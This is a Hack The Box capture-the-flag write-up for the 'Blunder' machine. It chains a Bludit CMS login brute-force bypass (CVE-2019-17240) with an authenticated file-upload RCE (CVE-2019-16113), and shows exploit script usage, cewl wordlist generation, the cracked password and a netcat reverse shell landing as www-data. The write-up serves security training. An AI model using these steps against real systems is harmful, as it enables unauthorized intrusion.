Bruteforce Attack + RCE
While the target web application has been confirmed to be built with Bludit CMS with its instance being outdated that contains multiple vulnerabilities, I have identified 2 vulnerabilities that could be abused and chained together to gain a foothold on the target system;
- [[blunder_cve-2019-17240#[cve-2019-17240](https //nvd.nist.gov/vuln/detail/cve-2019-17240)|cve-2019-17240]]: Bruteforce Attack to the web administrative panel
- [[blunder_cve-2019-16113#[cve-2019-16113](https //nvd.nist.gov/vuln/detail/cve-2019-16113)|cve-2019-16113]]: Remote Code Execution
Bruteforce Attack
┌──(kali㉿kali)-[~/archive/htb/labs/blunder]
└─$ ruby CVE-2019-17240.rb --help
Bludit <= 3.9.2 - Authentication Bruteforce Mitigation Bypass
Usage:
CVE-2019-17240.rb -r <url> -u <username> -w <path> [--debug]
CVE-2019-17240.rb -H | --help
Options:
-r <url>, --root-url <url> Root URL (base path) including HTTP scheme, port and root folder
-u <username>, --user <username> Username of the admin
-w <path>, --wordlist <path> Path to the wordlist file
--debug Display arguments
-H, --help Show this screen
Examples:
CVE-2019-17240.rb -r http://example.org -u admin -w myWordlist.txt
CVE-2019-17240.rb -r https://example.org:8443/bludit -u john -w /usr/share/wordlists/password/rockyou.txtThe [[Blunder_CVE-2019-17240#[Exploit](https //www.exploit-db.com/exploits/48746)|Ruby script]] requires the target URL, username and a wordlist
- I could use
fergusfor the username flag as thefergususer is suspected to be an admin user - It would be extremely vague to use a dummy password file (i.e.
rockyou.txt)- During the Web enumeration, I found the
/aboutpage very suggestive- I will attempt to create a wordlist out of the website
- During the Web enumeration, I found the
Wordlist Generation
┌──(kali㉿kali)-[~/archive/htb/labs/blunder]
└─$ cewl http://$IP -d 1 -m 6 --with-numbers -w wordlist.txt -v
cewl 6.1 (max length) robin wood (robin@digi.ninja) (https://digi.ninja/)
starting at http://10.10.10.191
visiting: http://10.10.10.191, got response code 200
attribute text found:
visiting: http://10.10.10.191/about referred from http://10.10.10.191, got response code 200
attribute text found:
visiting: http://10.10.10.191/stephen-king-0 referred from http://10.10.10.191, got response code 200
attribute text found:
visiting: http://10.10.10.191/stadia referred from http://10.10.10.191, got response code 200
attribute text found:
visiting: http://10.10.10.191/usb referred from http://10.10.10.191, got response code 200
attribute text found:
offsite link, not following: https://www.computerhope.com/history/1996.htm
offsite link, not following: https://www.twitter.com/WhortonMr
Writing words to filecewl is a Ruby script that spiders a given URL and fetch associated context for authentic wordlist generation
Execution
┌──(kali㉿kali)-[~/archive/htb/labs/blunder]
└─$ ruby CVE-2019-17240.rb -r http://$IP -u fergus -w wordlist.txt
[*] Trying password: Plugins
[*] Trying password: Include
[*] Trying password: service
[*] Trying password: Stadia
[...REDACTED...]
[*] Trying password: Letters
[*] Trying password: probably
[*] Trying password: fictional
[*] Trying password: character
[*] Trying password: RolandDeschain
[+] Password found: RolandDeschainFound the password for the fergus user to the web administrative panel; RolandDeschain
Authenticated
Authenticated to the web administrative panel
RCE
Now that I have authenticated to the web administrative panel with the credential of the fergus user, I can proceed to gain a foothold via RCE
I have modified the Python script to match the current environment
┌──(kali㉿kali)-[~/archive/htb/labs/blunder]
└─$ python2 CVE-2019-16113.py
[+] Login successful!
[+] Upload of malicious file upbyntvprf.png successful!
[+] Modification of .htaccess successful!
[+] Sending request to spawn shell. You may Crtl+C this program once shell is recieved.Executing
┌──(kali㉿kali)-[~/archive/htb/labs/blunder]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.14.17] from (UNKNOWN) [10.10.10.191] 41946
Linux blunder 5.3.0-53-generic #47-Ubuntu SMP Thu May 7 12:18:16 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
07:12:45 up 1:39, 1 user, load average: 22.02, 21.82, 17.03
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
shaun :0 :0 05:33 ?xdm? 5:09 0.01s /usr/lib/gdm3/gdm-x-session --run-script env GNOME_SHELL_SESSION_MODE=ubuntu /usr/bin/gnome-session --systemd --session=ubuntu
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ hostname
blunder
$ ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.10.10.191 netmask 255.255.255.0 broadcast 10.10.10.255
inet6 dead:beef::250:56ff:feb9:30a prefixlen 64 scopeid 0x0<global>
inet6 fe80::250:56ff:feb9:30a prefixlen 64 scopeid 0x20<link>
ether 00:50:56:b9:03:0a txqueuelen 1000 (Ethernet)
RX packets 2131297 bytes 177834287 (177.8 MB)
RX errors 0 dropped 38 overruns 0 frame 0
TX packets 1475722 bytes 1013586485 (1.0 GB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 10011 bytes 884200 (884.2 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 10011 bytes 884200 (884.2 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0Initial Foothold established to the target system as the www-data user via chaining [[Blunder_CVE-2019-17240#[CVE-2019-17240](https //nvd.nist.gov/vuln/detail/CVE-2019-17240)|CVE-2019-17240]] + [[Blunder_CVE-2019-16113#[CVE-2019-16113](https //nvd.nist.gov/vuln/detail/CVE-2019-16113)|CVE-2019-16113]]